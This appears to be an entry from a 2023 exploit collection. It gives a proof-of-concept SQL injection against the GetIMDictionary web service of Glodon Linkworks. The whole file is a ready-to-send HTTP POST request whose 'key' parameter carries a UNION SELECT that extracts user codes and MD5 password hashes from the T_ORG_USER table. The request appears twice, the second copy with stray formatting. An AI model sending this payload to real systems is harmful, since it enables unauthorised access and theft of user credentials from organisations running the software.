2023Hvv/广联达 Linkworks GetIMDictionarySQL 注入漏洞.md

POC: 

```
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 
Host: 
Content-Type: application/x-www-form-urlencoded

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
```
add 2023-08-13 14:27:10 +08:00			`POC:`

			```
			`POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1`
			`Host:`
			`Content-Type: application/x-www-form-urlencoded`

			`key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --`
			```